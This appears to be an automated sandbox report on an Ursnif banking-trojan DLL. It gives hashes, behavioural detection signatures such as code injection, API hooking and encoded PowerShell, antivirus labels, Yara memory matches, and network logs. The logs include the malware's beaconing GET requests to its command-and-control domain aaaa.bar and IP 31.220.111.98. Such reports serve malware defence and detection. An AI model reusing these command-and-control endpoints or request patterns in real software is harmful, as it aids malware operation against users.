Windows Analysis Report gECym.bin

Overview

General Information

Sample Name: gECym.bin (renamed file extension from bin to dll)
Analysis ID: 506330
MD5: fcb53acd5fd1637a2ac1bc69f396e92c
SHA1: a09432a56375c5a39856d59e402c3f8642edda7b
SHA256: cc7045d9fe77c4aa4cb646d01fb4700008a34f58f49358d0b0b0997d21016aab
Tags: 7412exegreenpassisfbursnif
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Sigma detected: Powershell run code from registry
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Sigma detected: Encoded IEX
Hooks registry keys query functions (used to hide registry keys)
Writes or reads registry keys via WMI
Suspicious powershell command line found
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Mshta Spawning Windows Shell
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Modifies the import address table of user mode modules (user mode IAT hooks)
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Creates a DirectInput object (often for capturing keystrokes)
PE file contains an invalid checksum
Tries to load missing DLLs
Contains functionality to read the PEB
Registers a DLL
PE / OLE file has an invalid certificate
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

barindex
Multi AV Scanner detection for submitted file
Source: gECym.dll Virustotal: Detection: 10% Perma Link
Antivirus or Machine Learning detection for unpacked file
Source: 0.2.loaddll32.exe.10000000.3.unpack Avira: Label: TR/Crypt.XPACK.Gen8

Compliance:

barindex
Uses 32bit PE files
Source: gECym.dll Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.5:49784 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.5:49785 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.7.139:443 -> 192.168.2.5:49821 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.7.139:443 -> 192.168.2.5:49820 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.3.70:443 -> 192.168.2.5:49827 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.38:443 -> 192.168.2.5:49825 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.3.70:443 -> 192.168.2.5:49826 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.38:443 -> 192.168.2.5:49824 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49837 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49836 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49835 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49834 version: TLS 1.2
Source: unknown HTTPS traffic detected: 31.220.111.98:443 -> 192.168.2.5:49952 version: TLS 1.2
Source: unknown HTTPS traffic detected: 31.220.111.98:443 -> 192.168.2.5:49954 version: TLS 1.2
Source: unknown HTTPS traffic detected: 31.220.111.98:443 -> 192.168.2.5:49963 version: TLS 1.2
Source: unknown HTTPS traffic detected: 31.220.111.98:443 -> 192.168.2.5:49969 version: TLS 1.2

Networking:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\regsvr32.exe Domain query: aaaa.bar
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 31.220.111.98 187
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown Network traffic detected: HTTP traffic on port 49970 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49967 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49960 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49960
Source: unknown Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49963 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49954
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49969 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49962 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49824
Source: loaddll32.exe, 00000000.00000003.725335981.000000000124A000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.769019185.0000000003322000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: loaddll32.exe, 00000000.00000002.800125274.00000000011E8000.00000004.00000020.sdmp, regsvr32.exe, 00000003.00000003.750727112.0000000003333000.00000004.00000001.sdmp String found in binary or memory: https://aaaa.bar/
Source: loaddll32.exe, 00000000.00000002.798277026.0000000001160000.00000004.00000020.sdmp, loaddll32.exe, 00000000.00000002.800825641.000000000122E000.00000004.00000020.sdmp String found in binary or memory: https://aaaa.bar/jdraw/34E0B5g64GhF/3XPDxs0lbMy/bqW9ARMnbt0tkT/D8MYNhHmIu3qZwQWjO72P/RY9TfewXOKIHe_2
Source: loaddll32.exe, 00000000.00000002.800982427.000000000123F000.00000004.00000020.sdmp, loaddll32.exe, 00000000.00000002.798415172.000000000116B000.00000004.00000020.sdmp String found in binary or memory: https://aaaa.bar/jdraw/VsEIWZ_2Fbo/VS2aUL2DPkksBz/_2BbHmaiMGFq8k7sf_2FK/_2BE4M1ccGRR2cER/_2ByL6dRggF
Source: loaddll32.exe, 00000000.00000002.800125274.00000000011E8000.00000004.00000020.sdmp String found in binary or memory: https://aaaa.bar/jdraw/v6MBuMp_2/FbQ1ciPPyCG2FcgWXCEw/4p6JWEqOHqaqqmtUZlW/iZ4hp74waYQa3SoGGuOho1/ovu
Source: unknown DNS traffic detected: queries for: www.msn.com
Source: global traffic HTTP traffic detected: GET /cookieconsentpub/v1/geo/location HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: geolocation.onetrust.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /tag?o=6208086025961472&upapi=true HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: btloader.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /px.gif?ch=1&e=0.9973131461099627 HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: ad-delivery.netConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico?ad=300x250&ad_box_=1&adnet=1&showad=1&size=250x250 HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: ad.doubleclick.netConnection: Keep-AliveCookie: IDE=AHWqTUkh5fOLAUMX20ZV8xqf__2tu45ymTec8GQqE60qWk9cSV6VA3zk_7PBuUk4
Source: global traffic HTTP traffic detected: GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F5b179a030c29a1ac065fdc22323514dd.png HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: img.img-taboola.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F18faa6af75b04f0199f63404d815074b.jpg HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: img.img-taboola.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2FGETTY_IMAGES%2FIBK%2F542734683__clsfZCtG.jpg HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: img.img-taboola.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F0d7ca0c89d5d09bf1d71170b01c3a769.jpg HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: img.img-taboola.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F5282696e9e2aabcd3d346a6d7ed7591e.png HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: img.img-taboola.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_pad%2Cb_auto/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Faedbb0638c2ccabdeb958fc2d93204dc.jpg HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: img.img-taboola.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /jdraw/v6MBuMp_2/FbQ1ciPPyCG2FcgWXCEw/4p6JWEqOHqaqqmtUZlW/iZ4hp74waYQa3SoGGuOho1/ovuxQrp7KsWgS/wBggvPBS/iWInt5CFnJyvSqpyHgJyYxn/O_2F_2BUYe/fLDTk5RpDf_2F9mZ_/2F7NAIxeGgZa/QcsaY21TZZx/U7QIv9qlBRWqpg/DR61HU_2FzqgxKP2wonEs/EkSZK.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: aaaa.barConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /jdraw/5EykzOMH8AC5xhH2f/h8YTRIF2mRSj/KI86vZ_2Fir/d_2FuekCCAOUjf/zFWcX3e13Ac_2BX_2BJGA/HUhc5yQiyPXedVM9/FyaB9AafT7f6pn1/rx17UyN0GmK2igoXTb/2p_2Bsvx3/fo8we1bgw6ZsfyAC6K72/DEX9YIVMXwvcSkZsNZR/8w9U8utAyGo407eExfiyfi/bLDkUZuz9hmdJ/XGInYyFxli4cy/JoKC.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: aaaa.barConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /jdraw/34E0B5g64GhF/3XPDxs0lbMy/bqW9ARMnbt0tkT/D8MYNhHmIu3qZwQWjO72P/RY9TfewXOKIHe_2B/ce4ORl02hRz9Esp/_2BVvpIh9LurZ83S_2/B0O2_2FdR/gIrNQT1mMUiZ_2BS_2BT/MDTnU5RczKhEBmBWqGJ/EyrDp1_2FuqKMBIze3vzAt/t9EP4e8z_2FDf/kKFLZbmvwAVEbK/QjYP.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: aaaa.barConnection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=al703vnk3gvkbspp3p283jhcg4; lang=en
Source: global traffic HTTP traffic detected: GET /jdraw/MVdZIiu0NzX64W/jGgxHg6bC6YiiTOGCL_2B/K5_2B4OguOIrq_2F/deq5LFM1_2Fh_2B/A30hkj4LBKS8PnjdwI/9w5zD21KD/Gv4zCmpHpXW8kBPJ6yzJ/GKf4n1QcwBRAhkvF2a_/2BDpnBrAV7AZvGg_2FwtGG/RaDUbMye7jqhn/NmN4Vf9F/bD7myyGQXfiKlv1_2BoXKI7/VLTDzeWG/dZ.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: aaaa.barConnection: Keep-AliveCache-Control: no-cacheCookie: lang=en; PHPSESSID=lsnqfh754hfkcfkt83tqpqmdf3
Source: global traffic HTTP traffic detected: GET /jdraw/VsEIWZ_2Fbo/VS2aUL2DPkksBz/_2BbHmaiMGFq8k7sf_2FK/_2BE4M1ccGRR2cER/_2ByL6dRggF3y7v/VMJcRRP5R6TojvxFTX/kOSl73q2F/w8Q6acp8KbUFCwTOVCqa/KHPQFw1IxW8ntmCw6R5/_2FriFMvRAS7jKjzJNgjI_/2B3Jlm1ZTjVZL/7f9n_2Fm/j0A3VF_2BTXTJlyVXccf7gs/IMfn4fjHWd/I3IboiX_2F3/uQt3.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: aaaa.barConnection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=al703vnk3gvkbspp3p283jhcg4; lang=en
Source: global traffic HTTP traffic detected: GET /jdraw/yQNRXOou_2F/TKb_2FDPLUxEHX/34UsINmRGrF0U0brjExsG/R8lvAy6e3bs7Nh2H/QoLe_2Bwp2v2e8Z/IwuiqSnSaPWQnudhme/0fUiRiwnK/HC2m5rShJXeZnaMhBAa7/2sv1pUExc23tcG4uzbe/S9YqUCaVHHJSHD_2FHBasu/DOlWi2P1fW4xM/vPgP1tY3/PB1yvdHjP2kNFl0vG_2Fhxc/khv1QiPG/3tnR7uH.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: aaaa.barConnection: Keep-AliveCache-Control: no-cacheCookie: lang=en
Source: global traffic HTTP traffic detected: GET /jdraw/NO7gR0KTty/Oqx9aKgxsT2Y54eU9/T_2Fq68MoL8B/sVtG7ExwGuN/2b4WQXmrNjZqxz/IsPGuUpM_2FQweZHv_2BB/qSCYCr2zsOkbh38r/It4yIHc8jFLoOJQ/k2WdhsET8UEtCwKWoz/qKONYcQpl/QBJ1lUtsdnk2R51rdvsn/Du_2F_2Ftub4vOTuIOX/47sdvY8Q/mQd32Pz7EA_2F/N.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: aaaa.barConnection: Keep-AliveCache-Control: no-cacheCookie: lang=en; PHPSESSID=lsnqfh754hfkcfkt83tqpqmdf3
Source: global traffic HTTP traffic detected: GET /jdraw/6ybu_2FNdKF0gG/m7orpeXdQJjdHGv7mDMIL/JfKVVeTDKq1gaDX7/GcXqJLlu546KZ6e/n4P4OzwLSG43PTmkn1/t0lauqlYi/uThwI2_2Bb89U_2F9plY/Zxq7QGyY_2FF4AUNHAt/i342YI4jYPKMWYQUn0qvUq/ia1VXOlbfvfYW/_2BuG_2B/Dlgb1sPi5LA4l6opVIFmhDT/0Z5HvD.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: aaaa.barConnection: Keep-AliveCache-Control: no-cacheCookie: lang=en; PHPSESSID=h4s0ka612qu3hrcshs8hb4ig95
Source: global traffic HTTP traffic detected: GET /jdraw/hqka30Wii/31Oq5rEnSRjUxODbgauN/3Qomlb_2B6I7h2xlFjq/YffmBTpCRrKlCahwBmdROz/L3L_2BpluTz9H/ch5yKjwO/n0FR27CV_2B_2FzpXk9iMJC/P_2Fk2e7Yv/b_2BW31QojrkMDFWC/tZHFJBu8lQql/OZI9lNxt6O0/sFuOUiC9FGcBD8/qZGUVX5D_2FYXiueA015K/GMEnEsw.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: aaaa.barConnection: Keep-AliveCache-Control: no-cacheCookie: lang=en; PHPSESSID=h4s0ka612qu3hrcshs8hb4ig95
Source: global traffic HTTP traffic detected: GET /jdraw/H4GjPkmE7AedOn2/SaetnicpaebgBYZBph/BvmQBH2Ya/Oa7o5fA_2FxihzNsKVGG/_2BKOERN0ze3StZ8PJO/K9jrlAYK2cirYDQTLgJFGo/m_2BMIG_2Ff7J/M2tNW_2B/JwKxyFyNvYCJPpLYcu2z3fg/Co6_2F9DSd/aeV2iIileaWP_2B3q/B8Ii95Syxk_2/BFqOHwCSf6U/KnFKNxJjQfI9vK/6tnrhCZ8FpH5l_2FDWF/lT.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: aaaa.barConnection: Keep-AliveCache-Control: no-cacheCookie: lang=en
Source: global traffic HTTP traffic detected: GET /jdraw/WNAlg8cEc/UcfXfHTDCraOPvAxQ0u0/IBGE8nVsnVmaTWmqt_2/FgXrkKfYI9UDVTSC9YOK9U/edsq3qaEaK4UV/nX98HXXg/zJ1jx_2BUw5Fkli5F8AIb_2/FG3fGkSRfJ/J4BestfVNDAUFKDxV/xH_2BYMBJKGO/i9O5kI15Exg/Ujf1s7nWsRKDBP/pBWe2EoKcTyJW0r5TV22O/pk_2FzstpMvpdzlO/Mq8HfsXB/P.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: aaaa.barConnection: Keep-AliveCache-Control: no-cacheCookie: lang=en; PHPSESSID=odtoci95m4hvgdsrbq2j2bach6
Source: global traffic HTTP traffic detected: GET /jdraw/gquCtxgLcwr_2F/e84ivzpkcm6RjGEX01HRQ/1JrxRgAMZnr84pf7/d6zLleHTDCpRxyP/mtUcNkhWJ9YEaOQAKu/ZbEc2Du6X/JsZUowsYOu98vblofvm0/EeOsadhZCmRp8ZCZ8KO/Ei99ya5BDB6uxeZYaXwGYu/W7LMC3IC7p7Aq/X8nzxfM9/9M7hUrRFHoU/Zf8MWsTW.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: aaaa.barConnection: Keep-AliveCache-Control: no-cacheCookie: lang=en; PHPSESSID=odtoci95m4hvgdsrbq2j2bach6
Source: unknown HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.5:49784 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.5:49785 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.7.139:443 -> 192.168.2.5:49821 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.7.139:443 -> 192.168.2.5:49820 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.3.70:443 -> 192.168.2.5:49827 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.38:443 -> 192.168.2.5:49825 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.3.70:443 -> 192.168.2.5:49826 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.38:443 -> 192.168.2.5:49824 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49837 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49836 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49835 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49834 version: TLS 1.2
Source: unknown HTTPS traffic detected: 31.220.111.98:443 -> 192.168.2.5:49952 version: TLS 1.2
Source: unknown HTTPS traffic detected: 31.220.111.98:443 -> 192.168.2.5:49954 version: TLS 1.2
Source: unknown HTTPS traffic detected: 31.220.111.98:443 -> 192.168.2.5:49963 version: TLS 1.2
Source: unknown HTTPS traffic detected: 31.220.111.98:443 -> 192.168.2.5:49969 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000009.00000003.668818796.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.669066527.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.760454651.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.720146282.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.725551694.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.669002058.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668792468.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696203622.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.668767287.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696328482.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.682552775.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.729873849.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.751457455.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.682707764.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.682497297.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668983889.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.682925882.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668839332.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.728388991.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.682449280.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.729934950.0000000004EDC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.669342603.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.726873336.0000000003A3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668597805.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696428988.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696293646.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.737533634.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668893514.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668698618.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.762064879.000000000532C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696353839.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696234648.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696265985.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.696490210.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.761914135.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.682640820.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.682808858.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.683000420.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.668889642.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.731054718.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.669161190.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.739495874.00000000058CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668637384.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.669217152.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.739276832.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668670422.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.719599695.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 2908, type: MEMORYSTR
